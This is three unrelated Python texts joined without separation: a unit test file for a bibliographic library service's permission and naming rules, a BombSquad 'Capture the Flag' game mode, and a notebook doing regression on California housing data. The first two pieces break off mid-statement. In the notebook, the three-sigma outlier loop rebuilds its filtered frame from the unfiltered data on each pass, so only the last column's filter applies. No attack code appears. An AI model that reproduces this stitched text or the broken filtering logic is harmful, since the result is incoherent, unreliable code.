session.add_all([user, user_other]) session.commit() session.refresh(user) session.expunge(user) session.refresh(user_other) session.expunge(user_other) # Make a library to make sure things work properly stub_library = LibraryShop() library = self.user_view.create_library( service_uid=user.id, library_data=stub_library.user_view_post_data ) stub_permissions = [{'read': True}, {'write': True}, {'admin': True}] for permission in stub_permissions: self.permission_view.add_permission(library_id=BaseView.helper_slug_to_uuid(library['id']), service_uid=user_other.id, permission=permission) # Get the library created with MockEmailService(stub_user_other, end_type='uid'): with MockEmailService(self.stub_user, end_type='uid'): libraries = self.user_view.get_libraries( service_uid=user_other.id, absolute_uid=user_other.absolute_uid ) self.assertEqual(list(permission.keys())[0], libraries[0]['permission']) def test_can_only_see_number_of_people_with_admin_or_owner(self): """ Test that the owner and admin can see the number of people :return: no return """ # To make a library we need an actual user user_owner = User(absolute_uid=self.stub_user_1.absolute_uid) user_admin = User(absolute_uid=self.stub_user_2.absolute_uid) library = Library() permission_admin = Permissions(permissions={'read': False, 'write': False, 'admin': True, 'owner': False}) permission_owner = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True}) library.permissions.append(permission_admin) library.permissions.append(permission_owner) user_admin.permissions.append(permission_admin) user_owner.permissions.append(permission_owner) with self.app.session_scope() as session: session.add_all([user_owner, user_admin, library, permission_admin, permission_owner]) session.commit() for obj in [user_owner, user_admin, library, permission_admin, permission_owner]: session.refresh(obj) session.expunge(obj) # Get the library created # For user admin with MockEmailService(self.stub_user_2, end_type='uid'): with MockEmailService(self.stub_user_1, end_type='uid'): libraries = self.user_view.get_libraries( service_uid=user_admin.id, absolute_uid=user_admin.absolute_uid )[0] self.assertTrue(libraries['num_users'] > 0) # For user owner with MockEmailService(self.stub_user_1, end_type='uid'): libraries = self.user_view.get_libraries( service_uid=user_owner.id, absolute_uid=user_owner.absolute_uid )[0] self.assertTrue(libraries['num_users'] > 0) def test_cannot_see_number_of_people_with_lower_than_admin(self): """ Test that the non-owner and non-admin cannot see the number of people :return: no return """ # To make a library we need an actual user user_read = User(absolute_uid=self.stub_user_1.absolute_uid) user_write = User(absolute_uid=self.stub_user_2.absolute_uid) user_owner = User(absolute_uid=self.stub_user_3.absolute_uid) library = Library() permission_read = Permissions(permissions={'read': True, 'write': False, 'admin': False, 'owner': False}) permission_write = Permissions(permissions={'read': False, 'write': True, 'admin': False, 'owner': False}) permission_owner = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True}) library.permissions.append(permission_read) library.permissions.append(permission_write) library.permissions.append(permission_owner) user_read.permissions.append(permission_read) user_write.permissions.append(permission_write) user_owner.permissions.append(permission_owner) with self.app.session_scope() as session: session.add_all([user_read, user_write, user_owner, library, permission_read, permission_write, permission_owner]) session.commit() for obj in [user_read, user_write, user_owner, library, permission_read, permission_write, permission_owner]: session.refresh(obj) session.expunge(obj) # Get the library created # For user read with MockEmailService(self.stub_user_3, end_type='uid'): libraries = self.user_view.get_libraries( service_uid=user_read.id, absolute_uid=user_read.absolute_uid )[0] self.assertTrue(libraries['num_users'] == 0) # make sure the owner is correct self.assertIn(libraries['owner'], self.stub_user_3.email) # For user write with MockEmailService(self.stub_user_3, end_type='uid'): libraries = self.user_view.get_libraries( service_uid=user_write.id, absolute_uid=user_write.absolute_uid )[0] self.assertTrue(libraries['num_users'] == 0) self.assertIn(libraries['owner'], self.stub_user_3.email) def test_user_cannot_add_two_libraries_with_the_same_name(self): """ Test that a user cannot add a new library with the same name :return: no return """ # To make a library we need an actual user user = User(absolute_uid=self.stub_user.absolute_uid) with self.app.session_scope() as session: session.add(user) session.commit() session.refresh(user) session.expunge(user) # Make the first library self.user_view.create_library( service_uid=user.id, library_data=self.stub_library.user_view_post_data ) # Make the second library with self.assertRaises(BackendIntegrityError): self.user_view.create_library( service_uid=user.id, library_data=self.stub_library.user_view_post_data ) def test_default_name_and_description_given_when_empty_string_passed(self): """ Test that a user who provides empty strings for the name and description has them generated automatically. :return: no return """ # Stub data stub_library = LibraryShop() # To make a library we need an actual user user = User(absolute_uid=self.stub_user.absolute_uid) with self.app.session_scope() as session: session.add(user) session.commit() session.refresh(user) session.expunge(user) # Make the first library for i in range(2): # On each loop the user view post will be modified, so lets just # be explicit about what we want stub_library.user_view_post_data['name'] = '' stub_library.user_view_post_data['description'] = '' library = self.user_view.create_library( service_uid=user.id, library_data=stub_library.user_view_post_data ) lib = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library['id'])).one() self.assertTrue(lib.name == 'Untitled Library {0}'.format(i+1)) self.assertTrue(lib.description == DEFAULT_LIBRARY_DESCRIPTION) def test_default_name_and_description_given_when_no_content(self): """ Test that a user who does not specify a title or description has them generated automatically. :return: no return """ # Stub data stub_library = LibraryShop(name=None, description=None) del stub_library.name del stub_library.description with self.assertRaises(AttributeError): stub_library.name stub_library.description stub_library.user_view_post_data.pop('name') stub_library.user_view_post_data.pop('description') with self.assertRaises(KeyError): stub_library.user_view_post_data['name'] stub_library.user_view_post_data['description'] # To make a library we need an actual user user = User(absolute_uid=self.stub_user.absolute_uid) with self.app.session_scope() as session: session.add(user) session.commit() session.refresh(user) session.expunge(user) # Make the first library for i in range(2): library = self.user_view.create_library( service_uid=user.id, library_data=stub_library.user_view_post_data ) with self.app.session_scope() as session: lib = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library['id'])).one() self.assertTrue(lib.name == 'Untitled Library {0}'.format(i+1)) self.assertTrue(lib.description == DEFAULT_LIBRARY_DESCRIPTION) def test_long_description_is_truncated(self): """ Test that a user who provides a very long library description has that description truncated appropriately. :return: no return """ # stub data stub_library = LibraryShop(name="Test Library", description="x"*400) # make a user user = User(absolute_uid=self.stub_user.absolute_uid) with self.app.session_scope() as session: session.add(user) session.commit() session.refresh(user) session.expunge(user) # make the library library = self.user_view.create_library(service_uid=user.id, library_data=stub_library.user_view_post_data) # check description length with self.app.session_scope() as session: lib = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library['id'])).one() self.assertTrue(lib.name == "Test Library") self.assertTrue(len(lib.description) <= 200) class TestLibraryViews(TestCaseDatabase): """ Base class to test the Library view for GET """ def __init__(self, *args, **kwargs): """ Constructor of the class :param args: to pass on to the super class :param kwargs: to pass on to the super class :return: no return """ super(TestLibraryViews, self).__init__(*args, **kwargs) self.user_view = UserView self.library_view = LibraryView self.stub_user = self.stub_user_1 = UserShop() self.stub_user_2 = UserShop() self.stub_library = LibraryShop() def test_user_can_get_documents_from_library(self): """ Test that can retrieve all the bibcodes from a library :return: no return """ # Ensure a user exists user = User(absolute_uid=self.stub_user.absolute_uid) with self.app.session_scope() as session: session.add(user) session.commit() # Ensure a library exists library = Library(name='MyLibrary', description='My library', public=True, bibcode=self.stub_library.bibcode) # Give the user and library permissions permission = Permissions(permissions={'read': True, 'write': True, 'admin': False, 'owner': True}) # Commit the stub data user.permissions.append(permission) library.permissions.append(permission) session.add_all([library, permission, user]) session.commit() for obj in [library, permission, user]: session.refresh(obj) session.expunge(obj) # Retrieve the bibcodes using the web services with MockEmailService(self.stub_user, end_type='uid'): response_library, meta_data = \ self.library_view.get_documents_from_library( library_id=library.id, service_uid=user.id ) self.assertEqual(library.bibcode, response_library.bibcode) def test_user_retrieves_correct_library_content(self): """ Test that the contents returned from the library_view contains all the information that we want :return: no return """ # Stub data user = User(absolute_uid=self.stub_user.absolute_uid) with self.app.session_scope() as session: session.add(user) session.commit() # Ensure a library exists library = Library(name='MyLibrary', description='My library', public=True, bibcode=self.stub_library.bibcode) # Give the user and library permissions permission = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True}) # Commit the stub data user.permissions.append(permission) library.permissions.append(permission) session.add_all([library, permission, user]) session.commit() for obj in [library, permission, user]: session.refresh(obj) session.expunge(obj) with MockEmailService(self.stub_user, end_type='uid'): library, metadata = self.library_view.get_documents_from_library( library_id=library.id, service_uid=user.id ) for key in self.stub_library.library_view_get_response(): self.assertIn(key, metadata) def test_user_retrieves_correct_library_content_if_not_owner(self): """ Test that the contents returned from the library_view contains all the information that we want :return: no return """ # Stub data user = User(absolute_uid=self.stub_user.absolute_uid) user_random = User(absolute_uid=self.stub_user_2.absolute_uid) with self.app.session_scope() as session: session.add(user) session.commit() # Ensure a library exists library = Library(name='MyLibrary', description='My library', public=False, bibcode=self.stub_library.bibcode) # Give the user and library permissions permission = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True}) # Commit the stub data user.permissions.append(permission) library.permissions.append(permission) session.add_all([library, permission, user, user_random]) session.commit() for obj in [library, permission, user, user_random]: session.refresh(obj) session.expunge(obj) with MockEmailService(self.stub_user, end_type='uid'): library, metadata = self.library_view.get_documents_from_library( library_id=library.id, service_uid=user_random.id ) for key in self.stub_library.library_view_get_response(): self.assertIn(key, metadata) self.assertEqual(0, metadata['num_users']) def test_that_solr_data_is_returned(self): """ Test that can retrieve all the bibcodes from a library with the data returned from the solr bigquery end point :return: no return """ # Ensure a user exists user = User(absolute_uid=self.stub_user.absolute_uid) with self.app.session_scope() as session: session.add(user) session.commit() # Ensure a library exists library = Library(name='MyLibrary', description='My library', public=True, bibcode=self.stub_library.bibcode) # Give the user and library permissions permission = Permissions(permissions={'read': True, 'write': True, 'admin': False, 'owner': False}) # Commit the stub data user.permissions.append(permission) library.permissions.append(permission) session.add_all([library, permission, user]) session.commit() for obj in [library, permission, user]: session.refresh(obj) session.expunge(obj) # Retrieve the bibcodes using the web services with MockSolrBigqueryService(): response_library = self.library_view.solr_big_query( bibcodes=library.bibcode ) self.assertIn('responseHeader', response_library.json()) def test_that_solr_updates_canonical_bibcodes(self): """ Tests that a comparison between the solr data and the stored data is carried out. Mismatching documents are then updated appropriately. :return: no return """ # Ensure a
import bs import random def bsGetAPIVersion(): # see bombsquadgame.com/apichanges return 4 def bsGetGames(): return [CTFGame] class CTFFlag(bs.Flag): def __init__(self, activity, team): bs.Flag.__init__( self, materials=[team.gameData['flagMaterial']], position=team.gameData['basePos'], color=team.color) self._team = team self._heldCount = 0 self._counter = bs.newNode( 'text', owner=self.node, attrs={ 'inWorld': True, 'scale': 0.02, 'hAlign': 'center' }) self.resetReturnTimes() def resetReturnTimes(self): self._timeOutRespawnTime = int( self.getActivity().settings['Flag Idle Return Time']) self._touchReturnTime = float( self.getActivity().settings['Flag Touch Return Time']) def getTeam(self): return self._team class CTFGame(bs.TeamGameActivity): @classmethod def getName(cls): return 'Capture the Flag' @classmethod def getDescription(cls, sessionType): return 'Return the enemy flag to score.' @classmethod def supportsSessionType(cls, sessionType): return True if issubclass(sessionType, bs.TeamsSession) else False @classmethod def getSupportedMaps(cls, sessionType): return bs.getMapsSupportingPlayType("teamFlag") @classmethod def getSettings(cls, sessionType): return [ ("Score to Win", {'minValue': 1, 'default': 3}), ("Flag Touch Return Time", { 'minValue': 0, 'default': 0, 'increment': 1}), ("Flag Idle Return Time", { 'minValue': 5, 'default': 30, 'increment': 5}), ("Time Limit", { 'choices': [('None', 0), ('1 Minute', 60), ('2 Minutes', 120), ('5 Minutes', 300), ('10 Minutes', 600), ('20 Minutes', 1200)], 'default': 0 }), ("Respawn Times", { 'choices': [('Shorter', 0.25), ('Short', 0.5), ('Normal',1.0), ('Long',2.0), ('Longer', 4.0)], 'default': 1.0}), ("Epic Mode", {'default': False})] # yapf: disable def __init__(self, settings): bs.TeamGameActivity.__init__(self, settings) self._scoreBoard = bs.ScoreBoard() if self.settings['Epic Mode']: self._isSlowMotion = True self._alarmSound = bs.getSound("alarm") self._tickingSound = bs.getSound("ticking") self._lastScoreTime = 0 self._scoreSound = bs.getSound("score") self._swipSound = bs.getSound("swip") self._allBasesMaterial = bs.Material() def getInstanceDescription(self): if self.settings['Score to Win'] == 1: return 'Steal the enemy flag.' else: return ('Steal the enemy flag ${ARG1} times.', self.settings['Score to Win']) def getInstanceScoreBoardDescription(self): if self.settings['Score to Win'] == 1: return 'return 1 flag' else: return ('return ${ARG1} flags', self.settings['Score to Win']) def onTransitionIn(self): bs.TeamGameActivity.onTransitionIn( self, music='Epic' if self.settings['Epic Mode'] else 'FlagCatcher') def onTeamJoin(self, team): team.gameData['score'] = 0 team.gameData['flagReturnTouches'] = 0 team.gameData['homeFlagAtBase'] = True team.gameData['touchReturnTimer'] = None team.gameData['enemyFlagAtBase'] = False team.gameData['basePos'] = self.getMap().getFlagPosition(team.getID()) self.projectFlagStand(team.gameData['basePos']) bs.newNode( 'light', attrs={ 'position': team.gameData['basePos'], 'intensity': 0.6, 'heightAttenuated': False, 'volumeIntensityScale': 0.1, 'radius': 0.1, 'color': team.color }) baseRegionMat = team.gameData['baseRegionMaterial'] = bs.Material() p = team.gameData['basePos'] team.gameData['baseRegion'] = bs.newNode( "region", attrs={ 'position': (p[0], p[1] + 0.75, p[2]), 'scale': (0.5, 0.5, 0.5), 'type': 'sphere', 'materials': [baseRegionMat, self._allBasesMaterial] }) # create some materials for this team spazMatNoFlagPhysical = team.gameData[ 'spazMaterialNoFlagPhysical'] = bs.Material() spazMatNoFlagCollide = team.gameData[ 'spazMaterialNoFlagCollide'] = bs.Material() flagMat = team.gameData['flagMaterial'] = bs.Material() # some parts of our spazzes don't collide physically with our # flags but generate callbacks spazMatNoFlagPhysical.addActions( conditions=('theyHaveMaterial', flagMat), actions=(('modifyPartCollision', 'physical', False), ('call', 'atConnect', lambda: self._handleHitOwnFlag(team, 1)), ('call', 'atDisconnect', lambda: self._handleHitOwnFlag(team, 0)))) # other parts of our spazzes don't collide with our flags at all spazMatNoFlagCollide.addActions( conditions=('theyHaveMaterial', flagMat), actions=('modifyPartCollision', 'collide', False)) # we wanna know when *any* flag enters/leaves our base baseRegionMat.addActions( conditions=('theyHaveMaterial', bs.Flag.getFactory().flagMaterial), actions=(('modifyPartCollision', 'collide', True), ('modifyPartCollision', 'physical', False), ('call', 'atConnect', lambda: self._handleFlagEnteredBase(team)), ('call', 'atDisconnect', lambda: self._handleFlagLeftBase(team)))) self._spawnFlagForTeam(team) self._updateScoreBoard() def onBegin(self): bs.TeamGameActivity.onBegin(self) self.setupStandardTimeLimit(self.settings['Time Limit']) self.setupStandardPowerupDrops() bs.gameTimer(1000, call=self._tick, repeat=True) def _spawnFlagForTeam(self, team): flag = team.gameData['flag'] = CTFFlag(self, team) team.gameData['flagReturnTouches'] = 0 self._flashBase(team, length=1000) bs.playSound(self._swipSound, position=flag.node.position) def _handleFlagEnteredBase(self, team): flag = bs.getCollisionInfo("opposingNode").getDelegate() if flag.getTeam() is team: team.gameData['homeFlagAtBase'] = True # if the enemy flag is already here, score! if team.gameData['enemyFlagAtBase']: self._score(team) else: team.gameData['enemyFlagAtBase'] = True if team.gameData['homeFlagAtBase']: # award points to whoever was carrying the enemy flag try: player = flag._lastPlayerToHold except Exception: player = None if player is not None and player.exists( ) and player.getTeam() is team: self.scoreSet.playerScored(player, 50, bigMessage=True) # update score and reset flags self._score(team) # if the home-team flag isn't here, print a message to that effect else: if not hasattr(self, '_lastHomeFlagNoticePrintTime'): self._lastHomeFlagNoticePrintTime = 0 t = bs.getRealTime() if t - self._lastHomeFlagNoticePrintTime > 5000: self._lastHomeFlagNoticePrintTime = t p = team.gameData['basePos'] tNode = bs.newNode( 'text', attrs={ 'text': bs.Lstr(resource='ownFlagAtYourBaseWarning'), 'inWorld': True, 'scale': 0.013, 'color': (1, 1, 0, 1), 'hAlign': 'center', 'position': (p[0], p[1] + 3.2, p[2]) }) bs.gameTimer(5100, tNode.delete) bs.animate(tNode, 'scale', { 0: 0, 200: 0.013, 4800: 0.013, 5000: 0 }) def _tick(self): # if either flag is away from base and not being held, tick down its # respawn timer for team in self.teams: flag = team.gameData['flag'] if not team.gameData['homeFlagAtBase'] and flag._heldCount == 0: timeOutCountingDown = True flag._timeOutRespawnTime -= 1 if flag._timeOutRespawnTime <= 0: flag.handleMessage(bs.DieMessage()) else: timeOutCountingDown = False if flag.node.exists() and flag._counter.exists(): t = flag.node.position flag._counter.position = (t[0], t[1] + 1.3, t[2]) # if there's no self-touches on this flag, set its text # to show its auto-return counter. (if there's self-touches # its showing that time) if team.gameData['flagReturnTouches'] == 0: flag._counter.text = str(flag._timeOutRespawnTime) if ( timeOutCountingDown and flag._timeOutRespawnTime <= 10) else '' flag._counter.color = (1, 1, 1, 0.5) flag._counter.scale = 0.014 def _score(self, team): team.gameData['score'] += 1 bs.playSound(self._scoreSound) self._flashBase(team) self._updateScoreBoard() # have teammates celebrate for player in team.players: try: player.actor.node.handleMessage('celebrate', 2000) except Exception: pass # reset all flags/state for resetTeam in self.teams: if not resetTeam.gameData['homeFlagAtBase']: resetTeam.gameData['flag'].handleMessage(bs.DieMessage()) resetTeam.gameData['enemyFlagAtBase'] = False if team.gameData['score'] >= self.settings['Score to Win']: self.endGame() def endGame(self): results = bs.TeamGameResults() for t in self.teams: results.setTeamScore(t, t.gameData['score']) self.end(results=results, announceDelay=800) def _handleFlagLeftBase(self, team): curTime = bs.getGameTime() opNode = bs.getCollisionInfo("opposingNode") try: flag = opNode.getDelegate() except Exception: return # can happen when we kill a flag if flag.getTeam() is team: # check times here to prevent too much flashing if ('lastFlagLeaveTime' not in team.gameData or curTime - team.gameData['lastFlagLeaveTime'] > 3000): bs.playSound( self._alarmSound, position=team.gameData['basePos']) self._flashBase(team) team.gameData['lastFlagLeaveTime'] = curTime team.gameData['homeFlagAtBase'] = False else: team.gameData['enemyFlagAtBase'] = False def _touchReturnUpdate(self, team): # count down only while its away from base and not being held if (team.gameData['homeFlagAtBase'] or team.gameData['flag']._heldCount > 0): team.gameData['touchReturnTimerTicking'] = None return # no need to return when its at home else: if team.gameData['touchReturnTimerTicking'] is None: team.gameData['touchReturnTimerTicking'] = bs.NodeActor( bs.newNode( 'sound', attrs={ 'sound': self._tickingSound, 'positional': False, 'loop': True })) flag = team.gameData['flag'] flag._touchReturnTime -= 0.1 if flag._counter.exists(): flag._counter.text = "%.1f" % flag._touchReturnTime flag._counter.color = (1, 1, 0, 1) flag._counter.scale = 0.02 if flag._touchReturnTime <= 0.0: self._awardPlayersTouchingOwnFlag(team) flag.handleMessage(bs.DieMessage()) def _awardPlayersTouchingOwnFlag(self, team): for player in team.players: if player.gameData['touchingOwnFlag'] > 0: returnScore = 10 + 5 * int( self.settings['Flag Touch Return Time']) self.scoreSet.playerScored( player, returnScore, screenMessage=False) def _handleHitOwnFlag(self, team, val): # keep track of when each player is touching their own flag so we can # award points when returned srcNode = bs.getCollisionInfo('sourceNode') try: player = srcNode.getDelegate().getPlayer() except Exception: player = None if player is not None and player.exists(): if val: player.gameData['touchingOwnFlag'] += 1 else: player.gameData['touchingOwnFlag'] -= 1 # if return-time is zero, just kill it immediately.. otherwise keep # track of touches and count down if float(self.settings['Flag Touch Return Time']) <= 0.0: if (not team.gameData['homeFlagAtBase'] and team.gameData['flag']._heldCount == 0): # use a node message to kill the flag instead of just killing # our team's. (avoids redundantly killing new flags if # multiple body parts generate callbacks in one step) node = bs.getCollisionInfo("opposingNode") if node is not None and node.exists(): self._awardPlayersTouchingOwnFlag(team) node.handleMessage(bs.DieMessage()) # takes a non-zero amount of time to return else: if val: team.gameData['flagReturnTouches'] += 1 if team.gameData['flagReturnTouches'] == 1: team.gameData['touchReturnTimer'] = bs.Timer( 100, call=bs.Call(self._touchReturnUpdate, team), repeat=True) team.gameData['touchReturnTimerTicking'] = None else: team.gameData['flagReturnTouches'] -= 1 if team.gameData['flagReturnTouches'] == 0: team.gameData['touchReturnTimer'] = None team.gameData['touchReturnTimerTicking'] = None if team.gameData['flagReturnTouches'] < 0: bs.printError( 'CTF: flagReturnTouches < 0; this shouldn\'t happen.') def _flashBase(self, team, length=2000): light = bs.newNode( 'light', attrs={ 'position': team.gameData['basePos'], 'heightAttenuated': False, 'radius': 0.3, 'color': team.color }) bs.animate(light, 'intensity', {0: 0, 250: 2.0, 500: 0}, loop=True) bs.gameTimer(length, light.delete) def spawnPlayerSpaz(self, *args, **keywds): # intercept new spazzes and add our team material for them spaz = bs.TeamGameActivity.spawnPlayerSpaz(self, *args, **keywds) spaz.getPlayer().gameData['touchingOwnFlag'] = 0 noPhysicalMats = [ spaz.getPlayer().getTeam().gameData['spazMaterialNoFlagPhysical'] ] noCollideMats = [ spaz.getPlayer().getTeam().gameData['spazMaterialNoFlagCollide'] ] # our normal parts should still collide; just not physically # (so we can calc restores) spaz.node.materials = list(spaz.node.materials) + noPhysicalMats spaz.node.rollerMaterials = list( spaz.node.rollerMaterials) + noPhysicalMats # pickups and punches shouldn't hit at all though spaz.node.punchMaterials = list( spaz.node.punchMaterials) + noCollideMats spaz.node.pickupMaterials = list( spaz.node.pickupMaterials) + noCollideMats spaz.node.extrasMaterials = list( spaz.node.extrasMaterials) + noCollideMats return spaz def _updateScoreBoard(self): for team in self.teams: self._scoreBoard.setTeamValue(team, team.gameData['score'], self.settings['Score to Win']) def handleMessage(self, m): if isinstance(m, bs.PlayerSpazDeathMessage): bs.TeamGameActivity.handleMessage(self, m) # augment standard self.respawnPlayer(m.spaz.getPlayer()) elif isinstance(m, bs.FlagDeathMessage): try: bs.gameTimer(100, bs.Call(self._spawnFlagForTeam, m.flag.getTeam())) except: pass elif
#!/usr/bin/env python # coding: utf-8 # # Regression Project: The California Housing Prices Data Set # ### Context # This is the dataset used in the second chapter of <NAME>'s recent book *'Hands-On Machine learning with Scikit-Learn and TensorFlow'. (O'Reilly)* # # It serves as an excellent introduction to implementing machine learning algorithms because it requires rudimentary (first, primary, original, prime, primitive) data cleaning, has an easily understandable list of variables and sits at an optimal size between being to toyish and too cumbersome. # # The data contains information from the 1990 California census. # # ### Source # This dataset is a modified version of the California Housing dataset available from Luís Torgo's page (University of Porto). # # This dataset appeared in a 1997 paper titled *Sparse Spatial Autoregressions* by <NAME> and <NAME>, published in the *Statistics and Probability Letters* journal. **It contains one row per census block group**. A block group is the smallest geographical unit for which the U.S. Census Bureau publishes sample data **(a block group typically has a population of 600 to 3,000 people)**. # # Note that the **block groups are called "districts"** in the Jupyter notebooks, simply because in some contexts the name "block group" was confusing. # # ### Content # The data aren't cleaned so there are some preprocessing steps that were # required. # # The data file weighs about 1.35 MB and has 20,640 rows and 10 columns. # The names of the columns are pretty self explanatory: # 1. longitude: A measure of how far west a house is; a higher value is farther west # 2. latitude: A measure of how far north a house is; a higher value is farther north # 3. housing_median_age: Median age of a house within a block; a lower number is a newer building **("Block" == "District")** # 4. total_rooms: Total number of rooms within a block # 5. total_bedrooms: Total number of bedrooms within a block # 6. population: Total number of people residing within a block # 7. households: Total number of households, a group of people residing within a home unit, for a block # 8. median_income: Median income for households within a block of houses (measured in tens of thousands of US Dollars) # 9. median_house_value: Median house value for households within a block (measured in US Dollars) # 10. ocean_proximity: Location of the house w.r.t ocean/sea # # ### Tweaks # The dataset in this directory is almost identical to the original, with two differences: # - 207 values were randomly removed from the **total_bedrooms** column, so we can # discuss what to do with **missing data**. # - An additional categorical attribute called **ocean_proximity** was added,# the Bay area, inland or on an island. This allows discussing what to do with **categorical data**. # # # ## Import statements # # # In[ ]: # General tools import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns # statsmodels package import statsmodels.api as sm import statsmodels.formula.api as smf # For transformations and predictions from sklearn.preprocessing import FunctionTransformer from sklearn.linear_model import LinearRegression from scipy.optimize import curve_fit from sklearn.tree import DecisionTreeRegressor, export_graphviz from itertools import product from sklearn.neighbors import KNeighborsRegressor from sklearn.preprocessing import MinMaxScaler from sklearn.metrics import pairwise_distances from sklearn.model_selection import KFold, cross_val_score from sklearn.decomposition import PCA # For the tree visualization import pydot from IPython.display import Image from sklearn.externals.six import StringIO # For scoring from sklearn.metrics import mean_squared_error as mse from sklearn.metrics import mean_squared_log_error as msle # For split from sklearn.model_selection import train_test_split as split from sys import modules import warnings warnings.filterwarnings('ignore') # ## Get the data # **Upload** # In[ ]: if 'google.colab' in modules: from google.colab import files uploaded = files.upload() # **Read file** # In[ ]: housing_df = pd.read_csv("../../../input/camnugent_california-housing-prices/housing.csv") housing_df.shape # In[ ]: housing_df # ## EDA with map visualization # One good practice is to do EDA on the full data and **creating a copy** of it for not harming our test and training data. # In[ ]: plotter_df = housing_df.copy() # In[ ]: from PIL import Image plt.figure(figsize=(20,10)) img = np.array(Image.open("california.jpg")) plt.imshow(img, interpolation = "bilinear") plt.axis("off") print() # **Since there is geographical information (latitude and longitude), it is a good idea to create a scatterplot of all districts to visualize the data.** # In order to have an informative look on the plot we need to know the density for each point, so we use alpha=0.1 (transparency measure). # In[ ]: plt.figure(figsize=(10,8)) plt.scatter('longitude', 'latitude', data=plotter_df,alpha=0.1) plt.ylabel('Latitudes') plt.xlabel('Longitudes') plt.title('Geographical plot of Latitudes/Longitudes') print() # **median_income** influence on **median_house_value.** # In[ ]: plotter_df.plot(kind='scatter', x='longitude', y='latitude', alpha=0.4,s=plotter_df['median_income']*30, label='median_income', figsize=(10,7),c='median_house_value', cmap=plt.get_cmap('jet'), colorbar=True) plt.xlabel("Longitude", fontsize=14) plt.ylabel("Latitude", fontsize=14) plt.legend() print() # ## Look at the Data # In[ ]: housing_df.head() # In[ ]: housing_df.describe(include='all') # In[ ]: housing_df.info() # We can see that the 'total_bedrooms' column has only 20,433 non-null values compared to 20,640 non-null values in other columns. # # # In[ ]: housing_df.isna().sum() # # Data Cleaning # ## Handling missing values # Most Machine Learning algorithms cannot work with missing features, so let’s create a few functions to take care of them. We noticed earlier that the total_bedrooms attribute has some missing values, so let’s fix this. We have three options: # 1. Get rid of the corresponding districts. # 2. Get rid of the whole attribute. # 3. Set the values to some value (zero, the mean, the median, etc.) # In[ ]: # Option 1: dropping rows (districts) with missing values housing_df.dropna(subset=["total_bedrooms"], inplace=True) housing_df.shape # In[ ]: # Option 2: dropping the whole column #housing_df.drop("total_bedrooms", axis=1, inplace=True) #housing_df.shape # In[ ]: # Option 3: fill NA values #median_total_bedrooms = housing_df["total_bedrooms"].median() #housing_df["total_bedrooms"].fillna(median_total_bedrooms, inplace=True) #housing_df.shape # ## Handling ocean_proximity categorical column. # In[ ]: housing_df['ocean_proximity'].value_counts() # In[ ]: housing_df.boxplot(column=['median_house_value'], by='ocean_proximity') # We can see that there are only 5 rows with 'ocean_proximity'=='ISLAND'. # We decided to drop these values. # In[ ]: housing_df.drop(housing_df[housing_df['ocean_proximity']=='ISLAND'].index, inplace=True) housing_df.shape # ### Transform categorical data to discrete values # In[ ]: ocean_proximity_order = ['INLAND','<1H OCEAN', 'NEAR OCEAN', 'NEAR BAY'] #ocean_proximity_order = ['<1H OCEAN', 'INLAND', 'NEAR OCEAN', 'NEAR BAY', 'ISLAND'] ocean_proximity_map = dict(zip(ocean_proximity_order, range(len(ocean_proximity_order)))) housing_df['ocean_proximity'] = housing_df['ocean_proximity'].map(ocean_proximity_map) # In[ ]: housing_df['ocean_proximity'].value_counts() # ## Creating new features and deleting unnecessary features‏ # 1. The total number of rooms in a district is not very useful if you don’t know how many # households there are. What we really want is the number of rooms per household. # # 2. Similarly, the total number of bedrooms by itself is not very useful: We want to compare it to the number of rooms. # # 3. The population per household also seems like an interesting attribute combination to look at. # In[ ]: housing_df["rooms_per_household"] = housing_df["total_rooms"]/housing_df["households"] housing_df["bedrooms_per_room"] = housing_df["total_bedrooms"]/housing_df["total_rooms"] housing_df["population_per_household"]=housing_df["population"]/housing_df["households"] # In[ ]: # dropping unnecessary features housing_df.drop(["total_rooms","total_bedrooms","population"], axis=1, inplace=True) housing_df.head() # In[ ]: housing_df.shape # ## Split the data to train and test # In[ ]: housing_df_train, housing_df_test = split(housing_df, test_size=0.3, random_state=43) # In[ ]: housing_df_train.shape # ## Removing Outliers # # we can see median_house_value and housing_median_age have "peaks" # and this data should be removed. # In[ ]: housing_df_train.hist(bins=50,figsize=(20,15)) # In[ ]: housing_df_train = housing_df_train[(housing_df_train.median_house_value < 500001) & (housing_df_train.housing_median_age < 52)] housing_df_train.shape # Now we drop data which is not in the range of 3 sigma (+/-). # In[ ]: for col in housing_df_train.columns: if housing_df_train[col].dtype == 'float64': std = housing_df_train[col].std() ave = housing_df_train[col].mean() housing_df_train_1 = housing_df_train.loc[housing_df_train[col].between(ave-3*std, ave+3*std)] print(f'processing {col:10} --> {housing_df_train_1.shape[0]:5} rows remain') # # Linear Regression model: Assumptions of Linear Regression: # # 1) Linear Relationship between the features and target # # 2) Little or no Multicollinearity between the features # # 3) Homoscedasticity # # 4) Normal distribution of error # # 5) Little or No autocorrelation in the residuals # ### Check skewness (a measure of the asymmetry of a probability distribution) # In[ ]: housing_df_train_1.skew() # In[ ]: #log_rooms_per_household = np.log1p(housing_df_train_1['rooms_per_household']) #log_population_per_household = np.log1p(housing_df_train_1['population_per_household']) #log_households = np.log1p(housing_df_train_1['households']) #log_bedrooms_per_room = np.log1p(housing_df_train_1['bedrooms_per_room']) #housing_df_train_1['log_rooms_per_household'] = log_rooms_per_household #housing_df_train_1['log_population_per_household'] = log_population_per_household #housing_df_train_1['log_households'] = log_households #housing_df_train_1['log_bedrooms_per_room'] = log_bedrooms_per_room # dropping unnecessary features #housing_df_train_1.drop(["rooms_per_household","population_per_household","households","bedrooms_per_room" ], axis=1, inplace=True) #housing_df_train_1.skew() # In[ ]: housing_df_train_1.head() # ## Split and scaling the data and preparation to model # In[ ]: X_train = housing_df_train_1.drop(['median_house_value'],axis=1) y_train = housing_df_train_1['median_house_value'] # scaling the data scaler = MinMaxScaler() scaler.fit(X_train) X_train_scaled = pd.DataFrame(scaler.transform(X_train), columns=X_train.columns) X_train_scaled.head() # #Linear Relationship between the features and target # ## Correlation # In[ ]: corr_matrix = housing_df_train_1.corr() # we can see that median_income and ocean_proximity has the most efect on # median_house_value # In[ ]: corr_matrix['median_house_value'].sort_values(ascending=False) # **We can see a small negative correlation between the latitude and the median house 